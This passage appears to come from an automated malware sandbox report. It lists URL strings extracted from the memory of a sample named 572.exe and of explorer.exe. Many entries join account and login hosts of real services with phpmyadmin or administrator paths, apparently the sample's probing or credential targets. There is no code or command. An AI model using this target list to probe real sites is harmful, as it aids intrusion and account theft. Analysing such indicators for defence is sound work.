                Source: 572.exe, 00000009.00000003.4307717822.000000000598E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.mojang.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4307717822.000000000598E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.mojang.com/phpmyadmin/&
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.mojang.com/phpmyadmin/com
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.mojang.com/phpmyadmin/jang.com22
                Source: 572.exe, 00000009.00000003.4307098588.000000000622F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.binance.com/en/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.binance.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.ecitizen.go.ke/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.ecitizen.go.ke/phpmyadmin/%
                Source: 572.exe, 00000009.00000003.4528238384.00000000059A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.faceit.com/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.faceit.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/admin
                Source: 572.exe, 00000009.00000003.4306089773.000000004E762000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/admin.php
                Source: 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/admin.phpo
                Source: 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/adminin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4327514305.000000004D9B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/administrator/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/administrator/:
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/administrator/N
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/administrator/index.php525
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/phpmyadmin//
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/phpmyadmin/0:
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/phpmyadmin/F
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/phpmyadmin/ig
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/phpmyadmin/iideas.com995
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/phpmyadmin/insumos.com.arcom
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/phpmyadmin/l
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/phpmyadmin/oogle.com2221z
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.snap.com/
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.snapchat.com
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.snapchat.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.snapchat.com/phpmyadmin/Kd
                Source: 572.exe, 00000009.00000003.4337138614.000000004DAE9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.snapchat.com:443/administrator/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.snapchat.com:443/administrator/2
                Source: 572.exe, 00000009.00000003.3906194985.00000000640F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acctcdn.msauth.net
                Source: 572.exe, 00000009.00000003.4224252877.00000000640D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acctcdn.msauth.net/images/favicon.ico?v=2
                Source: explorer.exe, 00000002.00000000.2125091063.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
                Source: 572.exe, 00000009.00000003.4521192060.000000004E677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aeaaamorim.inovarmais.com/admin
                Source: 572.exe, 00000009.00000003.4579113128.0000000005628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aeaaamorim.inovarmais.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aeaaamorim.inovarmais.com/phpmyadmin/D
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ag.ufa9999.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ag.ufa9999.com/phpmyadmin/mra.com
                Source: 572.exe, 00000009.00000003.4299205287.0000000040630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com
                Source: 572.exe, 00000009.00000003.4307717822.000000000598E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analvids.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analvids.com/phpmyadmin//
                Source: explorer.exe, 00000002.00000000.2127512556.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.cmrsanmartin.ziz.cl/administrator/index.php
                Source: 572.exe, 00000009.00000003.4528238384.000000000599C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.cmrsanmartin.ziz.cl/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.cmrsanmartin.ziz.cl/phpmyadmin//
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.imvu.com/ui_event
                Source: explorer.exe, 00000002.00000000.2124664252.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 00000002.00000000.2124664252.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/I
                Source: explorer.exe, 00000002.00000000.2124664252.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 00000002.00000000.2124664252.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2124664252.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040415000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.jobpet.com.br/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.jobpet.com.br/phpmyadmin/in/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.plex.tv/administrator/index.php
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.plex.tv/administrator/index.phpedu.mx
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ar.bongacams.com/phpmyadmin
                Source: explorer.exe, 00000002.00000000.2124664252.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://auth.cambridgelms.org/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://auth.cambridgelms.org/phpmyadmin/Pe
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://auth.riotgames.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://authenticate.riotgames.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://authenticate.riotgames.com/phpmyadmin/dF
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bg.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.00000000315C1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.0000000006254000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.imvu.com/
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.zoom.us
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.zoom.us/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047B06000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004023B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bltassets-cdn3.global.ssl.fastly.net/assets/logo/header-logo-white.png
                Source: 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://brasilliker.net/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://business-preprod.snapchat.com
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://business.snapchat.com
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://careers.zoom.us/home
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://casinocontroller.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steam/apps/1091500/capsule_184x69.jpg?t=1706698946
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steam/apps/1144200/capsule_184x69.jpg?t=1705678438
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steam/apps/1240440/capsule_184x69.jpg?t=1706721794
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steam/apps/252490/capsule_184x69.jpg?t=1701938429
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steam/apps/271590/capsule_184x69.jpg?t=1706131787
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steam/apps/559650/header.jpg?t=1702485195
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steam/apps/814370/header.jpg?t=1698830027
                Source: 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steam/clusters/sale_autumn2019_assets/54b5034d397baccb93181cc
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steam/spotlights/22e86706af77022bc38fefb9/spotlight_image_eng
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steam/spotlights/94e6e699b603251851c56e84/spotlight_image_eng
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steam/spotlights/99d03965013437089a5c0335/spotlight_image_eng
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steam/spotlights/9fa9c4eea9bf3ccc9cb600f1/spotlight_image_eng
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steam/spotlights/b4d1e3612e9417c6f9ec94f2/spotlight_image_eng
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steam/spotlights/c9e559d574aa4985565e6710/spotlight_image_eng
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/store/home/store_home_share.jpg
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/store/home/store_index_promo.jpg
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.contentful.com/spaces/kp51zybwznx4/
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.00000000406FB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/scripttemplates/otSDKStub.js
                Source: 572.exe, 00000009.00000003.4299205287.0000000040630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net
                Source: 572.exe, 00000009.00000003.4184636529.0000000047A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ngrok.com/static/css/error.css
                Source: 572.exe, 00000009.00000003.4184636529.0000000047A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-SemiBold.woff
                Source: 572.exe, 00000009.00000003.4184636529.0000000047A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-SemiBoldItalic.woff
                Source: 572.exe, 00000009.00000003.4184636529.0000000047A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-TextItalic.woff
                Source: 572.exe, 00000009.00000003.4184636529.0000000047A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ngrok.com/static/js/error.js
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
                Source: explorer.exe, 00000002.00000000.2122878030.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.solvvy.com/deflect/customization/zoom/lazy-solvvy.js
                Source: 572.exe, 00000009.00000003.4288860252.0000000063FF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chainmine.io/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chainmine.io/phpmyadmin/0C;
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chat-gold.sc-corp.net;
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/;
                Source: 572.exe, 00000009.00000003.4196885790.0000000047B06000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040426000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298617897.0000000040427000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore/detail/bigefpfhnfcobdlfbedofhhaibnlghod
